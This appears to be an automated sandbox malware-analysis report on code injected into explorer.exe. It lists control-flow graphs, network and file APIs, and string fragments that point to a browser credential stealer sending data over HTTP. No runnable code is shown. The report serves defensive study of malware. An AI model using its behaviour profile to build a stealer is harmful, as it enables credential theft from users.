13714 101dc934 13712->13714 13713 101dc9a6 13713->13711 13714->13713 13715 101dc995 ObtainUserAgentString 13714->13715 13715->13713 13773 101d742e 13774 101d745b 13773->13774 13782 101d74c9 13773->13782 13775 101e1232 NtCreateFile 13774->13775 13774->13782 13776 101d7496 13775->13776 13777 101d74c5 13776->13777 13778 101d7082 NtCreateFile 13776->13778 13779 101e1232 NtCreateFile 13777->13779 13777->13782 13780 101d74b6 13778->13780 13779->13782 13780->13777 13781 101d6f52 NtCreateFile 13780->13781 13781->13777 13887 101de72e 13888 101de788 connect 13887->13888 13889 101de76a 13887->13889 13889->13888 13783 101dd22a 13784 101dd25e 13783->13784 13785 101dc8c2 ObtainUserAgentString 13784->13785 13786 101dd26b 13785->13786 13803 101e3aa9 13804 101e3aaf 13803->13804 13807 101de212 13804->13807 13806 101e3ac7 13808 101de237 13807->13808 13809 101de21b 13807->13809 13808->13806 13809->13808 13811 101de0c2 13809->13811 13812 101de1f0 13811->13812 13813 101de0cb 13811->13813 13812->13808 13813->13812 13814 101e1f82 6 API calls 13813->13814 13814->13812 13877 101de2e4 13878 101de36f 13877->13878 13879 101de305 13877->13879 13879->13878 13880 101de0c2 6 API calls 13879->13880 13880->13878 13922 101d8b66 13924 101d8b6a 13922->13924 13923 101d8cce 13924->13923 13925 101d8cb5 CreateMutexW 13924->13925 13925->13923 13881 101dbce2 13883 101dbdd9 13881->13883 13882 101dc022 13883->13882 13884 101db352 NtCreateFile 13883->13884 13885 101dbf0d 13884->13885 13885->13882 13886 101db792 NtCreateFile 13885->13886 13886->13885

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 299 101e1232-101e1256 300 101e125c-101e1260 299->300 301 101e18bd-101e18cd 299->301 300->301 302 101e1266-101e12a0 300->302 303 101e12bf 302->303 304 101e12a2-101e12a6 302->304 306 101e12c6 303->306 304->303 305 101e12a8-101e12ac 304->305 307 101e12ae-101e12b2 305->307 308 101e12b4-101e12b8 305->308 309 101e12cb-101e12cf 306->309 307->306 308->309 310 101e12ba-101e12bd 308->310 311 101e12f9-101e130b 309->311 312 101e12d1-101e12f7 call 101e1942 309->312 310->309 316 101e130d-101e1332 311->316 317 101e1378 311->317 312->311 312->317 318 101e1334-101e133b 316->318 319 101e13a1-101e13a8 316->319 320 101e137a-101e13a0 317->320 321 101e133d-101e1360 call 101e1942 318->321 322 101e1366-101e1370 318->322 323 101e13aa-101e13d3 call 101e1942 319->323 324 101e13d5-101e13dc 319->324 321->322 322->317 326 101e1372-101e1373 322->326 323->317 323->324 328 101e13de-101e140a call 101e1942 324->328 329 101e1410-101e1458 NtCreateFile call 101e1172 324->329 326->317 328->317 328->329 335 101e145d-101e145f 329->335 335->317 336 101e1465-101e146d 335->336 336->317 337 101e1473-101e1476 336->337 338 101e1478-101e1481 337->338 339 101e1486-101e148d 337->339 338->320 340 101e148f-101e14b8 call 101e1942 339->340 341 101e14c2-101e14ec 339->341 340->317 348 101e14be-101e14bf 340->348 346 101e18ae-101e18b8 341->346 347 101e14f2-101e14f5 341->347 346->317 349 101e14fb-101e14fe 347->349 350 101e1604-101e1611 347->350 348->341 351 101e155e-101e1561 349->351 352 101e1500-101e1507 349->352 350->320 357 101e1616-101e1619 351->357 358 101e1567-101e1572 351->358 354 101e1538-101e1559 352->354 355 101e1509-101e1532 call 101e1942 352->355 362 101e15e9-101e15fa 354->362 355->317 355->354 360 101e161f-101e1626 357->360 361 101e16b8-101e16bb 357->361 363 101e1574-101e159d call 101e1942 358->363 364 101e15a3-101e15a6 358->364 368 101e1628-101e1651 call 101e1942 360->368 369 101e1657-101e166b call 101e2e92 360->369 365 101e16bd-101e16c4 361->365 366 101e1739-101e173c 361->366 362->350 363->317 363->364 364->317 371 101e15ac-101e15b6 364->371 373 101e16c6-101e16ef call 101e1942 365->373 374 101e16f5-101e1734 365->374 376 101e17c4-101e17c7 366->376 377 101e1742-101e1749 366->377 368->317 368->369 369->317 391 101e1671-101e16b3 369->391 371->317 372 101e15bc-101e15e6 371->372 372->362 373->346 373->374 396 101e1894-101e18a9 374->396 376->317 380 101e17cd-101e17d4 376->380 383 101e177a-101e17bf 377->383 384 101e174b-101e1774 call 101e1942 377->384 386 101e17fc-101e1803 380->386 387 101e17d6-101e17f6 call 101e1942 380->387 383->396 384->346 384->383 394 101e182b-101e1835 386->394 395 101e1805-101e1825 call 101e1942 386->395 387->386 391->320 394->346 401 101e1837-101e183e 394->401 395->394 396->320 401->346 404 101e1840-101e1886 401->404 404->396
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: `
                                              • API String ID: 823142352-2679148245
                                              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                              • Instruction ID: 05c6a4865b46a07674f3c1e71850143e3184ac112c73264ebe918b71c528446e
                                              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                              • Instruction Fuzzy Hash: 6C224970A18E099FCB8ADF29C4956EEF7E1FB98305F51022EE45ED3650DB34A851CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 443 101e2e12-101e2e6e call 101e1942 NtProtectVirtualMemory 446 101e2e7d-101e2e8f 443->446 447 101e2e70-101e2e7c 443->447
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL ref: 101E2E67
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                              • Instruction ID: 76e83ef2b47d1b308234f6a86480eb1967e1f638c20c6292d27d0d292f77bcf8
                                              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                              • Instruction Fuzzy Hash: 6901B134668B884F8788EF6CE48116AB7E4FBDD314F000B3EE99AC3250EB74C5414742

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 448 101e2e0a-101e2e38 449 101e2e45-101e2e6e NtProtectVirtualMemory 448->449 450 101e2e40 call 101e1942 448->450 451 101e2e7d-101e2e8f 449->451 452 101e2e70-101e2e7c 449->452 450->449
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL ref: 101E2E67
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                              • Instruction ID: 4e387131062a18bf6f652fe9519bf462d19623f7c7bcb01b7e7c0c017f8c2489
                                              • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                              • Instruction Fuzzy Hash: 7101A234628B884F8749EB2C94512AAB7E5FBCE314F000B3EE99AC3241DB25D5024782

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 101e1f82-101e1fb6 1 101e1fb8-101e1fbc 0->1 2 101e1fd6-101e1fd9 0->2 1->2 3 101e1fbe-101e1fc2 1->3 4 101e28fe-101e290c 2->4 5 101e1fdf-101e1fed 2->5 3->2 6 101e1fc4-101e1fc8 3->6 7 101e28f6-101e28f7 5->7 8 101e1ff3-101e1ff7 5->8 6->2 9 101e1fca-101e1fce 6->9 7->4 10 101e1fff-101e2000 8->10 11 101e1ff9-101e1ffd 8->11 9->2 12 101e1fd0-101e1fd4 9->12 13 101e200a-101e2010 10->13 11->10 11->13 12->2 12->5 14 101e203a-101e2060 13->14 15 101e2012-101e2020 13->15 17 101e2068-101e207c call 101de5b2 14->17 18 101e2062-101e2066 14->18 15->14 16 101e2022-101e2026 15->16 16->7 19 101e202c-101e2035 16->19 24 101e2081-101e20a2 17->24 18->17 20 101e20a8-101e20ab 18->20 19->7 22 101e2144-101e2150 20->22 23 101e20b1-101e20b8 20->23 25 101e28ee-101e28ef 22->25 28 101e2156-101e2165 22->28 26 101e20ba-101e20dc call 101e1942 23->26 27 101e20e2-101e20f5 23->27 24->20 24->25 25->7 26->27 27->25 30 101e20fb-101e2101 27->30 31 101e217f-101e218f 28->31 32 101e2167-101e2178 call 101de552 28->32 30->25 36 101e2107-101e2109 30->36 33 101e21e5-101e221b 31->33 34 101e2191-101e21ad call 101de732 31->34 32->31 39 101e222d-101e2231 33->39 40 101e221d-101e222b 33->40 43 101e21b2-101e21da 34->43 36->25 41 101e210f-101e2111 36->41 45 101e2247-101e224b 39->45 46 101e2233-101e2245 39->46 44 101e227f-101e2280 40->44 41->25 47 101e2117-101e2132 getaddrinfo 41->47 43->33 48 101e21dc-101e21e1 43->48 52 101e2283-101e22e0 call 101e2d62 call 101df482 call 101dee72 call 101e3002 44->52 49 101e224d-101e225f 45->49 50 101e2261-101e2265 45->50 46->44 47->22 51 101e2134-101e213c 47->51 48->33 49->44 54 101e226d-101e2279 50->54 55 101e2267-101e226b 50->55 51->22 63 101e22f4-101e2354 call 101e2d92 52->63 64 101e22e2-101e22e6 52->64 54->44 55->52 55->54 69 101e248c-101e24b8 call 101e2d62 call 101e3262 63->69 70 101e235a-101e2396 call 101e2d62 call 101e3262 call 101e3002 63->70 64->63 65 101e22e8-101e22ef call 101df042 64->65 65->63 79 101e24ba-101e24d5 69->79 80 101e24d9-101e2590 call 101e3262 * 3 call 101e3002 * 2 call 101df482 69->80 85 101e23bb-101e23e9 call 101e3262 * 2 70->85 86 101e2398-101e23b7 call 101e3262 call 101e3002 70->86 79->80 111 101e2595-101e25b9 call 101e3262 80->111 101 101e23eb-101e2410 call 101e3002 call 101e3262 85->101 102 101e2415-101e241d 85->102 86->85 101->102 104 101e241f-101e2425 102->104 105 101e2442-101e2448 102->105 108 101e2467-101e2487 call 101e3262 104->108 109 101e2427-101e243d 104->109 110 101e244e-101e2456 105->110 105->111 108->111 109->111 110->111 115 101e245c-101e245d 110->115 121 101e25bb-101e25cc call 101e3262 call 101e3002 111->121 122 101e25d1-101e26ad call 101e3262 * 7 call 101e3002 call 101e2d62 call 101e3002 call 101dee72 call 101df042 111->122 115->108 132 101e26af-101e26b3 121->132 122->132 135 101e26ff-101e272d call 101de6b2 132->135 136 101e26b5-101e26fa call 101de382 call 101de7b2 132->136 145 101e272f-101e2735 135->145 146 101e275d-101e2761 135->146 155 101e28e6-101e28e7 136->155 145->146 151 101e2737-101e274c 145->151 147 101e290d-101e2913 146->147 148 101e2767-101e276b 146->148 157 101e2779-101e2784 147->157 158 101e2919-101e2920 147->158 152 101e28aa-101e28df call 101de7b2 148->152 153 101e2771-101e2773 148->153 151->146 156 101e274e-101e2754 151->156 152->155 153->152 153->157 155->25 156->146 163 101e2756 156->163 159 101e2786-101e2793 157->159 160 101e2795-101e2796 157->160 158->159 159->160 164 101e279c-101e27a0 159->164 160->164 163->146 167 101e27a2-101e27af 164->167 168 101e27b1-101e27b2 164->168 167->168 170 101e27b8-101e27c4 167->170 168->170 173 101e27c6-101e27ef call 101e2d92 call 101e2d62 170->173 174 101e27f4-101e2861 setsockopt recv 170->174 173->174 175 101e28a3-101e28a4 174->175 176 101e2863 174->176 175->152 176->175 179 101e2865-101e286a 176->179 179->175 182 101e286c-101e2872 179->182 182->175 185 101e2874-101e28a1 182->185 185->175 185->176
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: getaddrinforecvsetsockopt
                                              • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                              • API String ID: 1564272048-1117930895
                                              • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                              • Instruction ID: d587a8e50cef6fad9f3d4c329928e5ab2ff665a17ca3108ef882a185a33cb3c9
                                              • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                              • Instruction Fuzzy Hash: D3528D30618B488FC75AEF69C894BDEB7E1FB54300F51462ED4ABC7142DE38A949CB81

                                              Control-flow Graph

                                              APIs
                                              • ObtainUserAgentString.URLMON ref: 101DC9A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: AgentObtainStringUser
                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                              • API String ID: 2681117516-319646191
                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                              • Instruction ID: a4cc95772f73703f561ce3268fd4965fb07dfa48cec3d174c02b18ba03d472c5
                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                              • Instruction Fuzzy Hash: 4C31E571614A0D8FCB45EFA9C8997EEBBE1FF68204F40422AE44ED7240DF789645C785

                                              Control-flow Graph

                                              APIs
                                              • ObtainUserAgentString.URLMON ref: 101DC9A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: AgentObtainStringUser
                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                              • API String ID: 2681117516-319646191
                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                              • Instruction ID: d239fda5608258d9034c674e1e1fcb9491c14c746f47e6c94a1c873c1daa05ec
                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                              • Instruction Fuzzy Hash: 6D21D570610A4D8FCB05DFA9C8997EDBBE5FF68204F40421AE45AD7340DF789605CB85

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID: .dll$el32$kern
                                              • API String ID: 1964310414-1222553051
                                              • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                              • Instruction ID: 969edaa2b2781141d8c5d23524a4a0673ba3fcba33780370e94a1f39b306571c
                                              • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                              • Instruction Fuzzy Hash: 04416974928A088FDB85EFA8C899BED77E0FB68300F00416AD84EDB255DE349945CB85

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID: .dll$el32$kern
                                              • API String ID: 1964310414-1222553051
                                              • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                              • Instruction ID: aaeaec255f1da610106bea7f597fade5ee091f8fdf6ed0cc135f50ee1aed201c
                                              • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                              • Instruction Fuzzy Hash: BF414B74918A088FDB85EFA8C499BED77F0FB68300F00417AD84EDB255DE349945CB95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 289 101de72e-101de768 290 101de788-101de7ab connect 289->290 291 101de76a-101de782 call 101e1942 289->291 291->290
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: connect
                                              • String ID: conn$ect
                                              • API String ID: 1959786783-716201944
                                              • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                              • Instruction ID: aec9d3c0cfb2e0eca8b87891c11ac03637d51d6fa7afad649658d7d356771715
                                              • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                              • Instruction Fuzzy Hash: 5A015E30618B188FCB84EF1CE088B55B7E0FB68314F1545AEE90DCB226C674D8818BC2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 101de732-101de768 295 101de788-101de7ab connect 294->295 296 101de76a-101de782 call 101e1942 294->296 296->295
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: connect
                                              • String ID: conn$ect
                                              • API String ID: 1959786783-716201944
                                              • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                              • Instruction ID: e2afd62110d04ce529a919f174973dbfd0dedea7431c6697ca1a9eda6be4af2a
                                              • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                              • Instruction Fuzzy Hash: F5012C70618A1C8FCB84EF5CE088B55B7E0FB59315F1541AEA80DCB226CA74C9818BC2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 407 101de6b2-101de6e5 408 101de705-101de72d send 407->408 409 101de6e7-101de6ff call 101e1942 407->409 409->408
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: send
                                              • String ID: send
                                              • API String ID: 2809346765-2809346765
                                              • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                              • Instruction ID: 6b8fb02b77817e6d18f18291a92c084595ff71edaad3c049746645c5f97dcba4
                                              • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                              • Instruction Fuzzy Hash: 8F011270558A188FDBC4EF1CE089B1577E0EB58315F1645AED85DCB266C674D8818B81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 412 101de5b2-101de5ea 413 101de5ec-101de604 call 101e1942 412->413 414 101de60a-101de62b socket 412->414 413->414
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: socket
                                              • String ID: sock
                                              • API String ID: 98920635-2415254727
                                              • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                              • Instruction ID: 74a7b0894e2b94459610cd036230d0130acc3f31307a142d19c155fd9fac3433
                                              • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                              • Instruction Fuzzy Hash: F1012C70618A188FCB84EF1CE048B54BBE0FB59354F1545AEE85ECB266C7B4C9818B86

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 417 101d62dd-101d6320 call 101e1942 420 101d63fa-101d640e 417->420 421 101d6326 417->421 422 101d6328-101d6339 SleepEx 421->422 422->422 423 101d633b-101d6341 422->423 424 101d634b-101d6352 423->424 425 101d6343-101d6349 423->425 427 101d6354-101d635a 424->427 428 101d6370-101d6376 424->428 425->424 426 101d635c-101d636a call 101e0f12 425->426 426->428 427->426 427->428 430 101d6378-101d637e 428->430 431 101d63b7-101d63bd 428->431 430->431 433 101d6380-101d638a 430->433 434 101d63bf-101d63cf call 101d6e72 431->434 435 101d63d4-101d63db 431->435 433->431 438 101d638c-101d63b1 call 101d7432 433->438 434->435 435->422 437 101d63e1-101d63f5 call 101d60f2 435->437 437->422 438->431
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                              • Instruction ID: 993b11c22f281803e4217b1a5befa82d6b216d1b305ef1932d1ce16495097c5c
                                              • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                              • Instruction Fuzzy Hash: 43315AB4614B49EFDB94DF69808C299B7A1FB58300F444A7ED91DCB206CB78A4A4CFD1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 453 101d6412-101d6446 call 101e1942 456 101d6448-101d6472 call 101e3c9e CreateThread 453->456 457 101d6473-101d647d 453->457
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769399184.0000000010150000.00000040.80000000.00040000.00000000.sdmp, Offset: 10150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10150000_explorer.jbxd
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                              • Instruction ID: 0b33eb0da80502fa8aac4145fa65eee1e53f4544387dfd904da204b242983259
                                              • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                              • Instruction Fuzzy Hash: 39F0C234268E484FDB88EB2CD48562AB3E0EBE8214F45463EA54DC3264DA29D5814756
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                              • API String ID: 0-393284711
                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                              • Instruction ID: 63a67276b7d93f5bb4cd98a9953a4d3313c40330c303981cafd840f68b41f981
                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                              • Instruction Fuzzy Hash: 74E16B74618F488FC7A4DF68D4997AAB7E0FB58300F904A2EA59FC7245DF30A541CB89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                              • API String ID: 0-2916316912
                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                              • Instruction ID: aef2e930b315585a800e17285a84a09fcd347f8f86b7218466d754573e7f099c
                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                              • Instruction Fuzzy Hash: 33B17830518B48CEDB55EF68D48AAEAB7F1FF98300F50461EE49AC7251EE70A505CB86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                              • API String ID: 0-1539916866
                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                              • Instruction ID: 7dd65e8e656301848db463211b6a9bf30115e87afa4cb1f61f5444de429d54dc
                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                              • Instruction Fuzzy Hash: FA419070A18B08CFDB14DF88A44A6BD7BE2FB88700F00425EE409D3246DBB5AD45CBD6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                              • API String ID: 0-355182820
                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                              • Instruction ID: 7cbecb5ef428b7aef8e3b802741ed292fe5bbe80606cb788035921d82d5fa09a
                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                              • Instruction Fuzzy Hash: ECC16A74218B099FC758EF24D48AAAAF7E1FB98304F40472EA59AC7210DF70F555CB86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                              • API String ID: 0-97273177
                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                              • Instruction ID: b8f5d127ee2d551196e6df2a77d1f0354034926de4b76d2093ec29034ec097be
                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                              • Instruction Fuzzy Hash: 8E51E63061C7488FD709DF18D8856AAB7E5FBC5700F505A2EE9CBC7241DBB4A946CB82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                              • API String ID: 0-639201278
                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                              • Instruction ID: f63e8de04aa1489d1f9869c58bc9ee2b04e3f3fce4439f56b2d5214e7dd7dac0
                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                              • Instruction Fuzzy Hash: 2CC1A375618A19CFC758EF68E45AAAAB3E1FB98304F95432DA44EC7250DF30E901CBC5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.3769593983.0000000010770000.00000040.00000001.00040000.00000000.sdmp, Offset: 10770000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_10770000_explorer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                              • API String ID: 0-639201278
                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
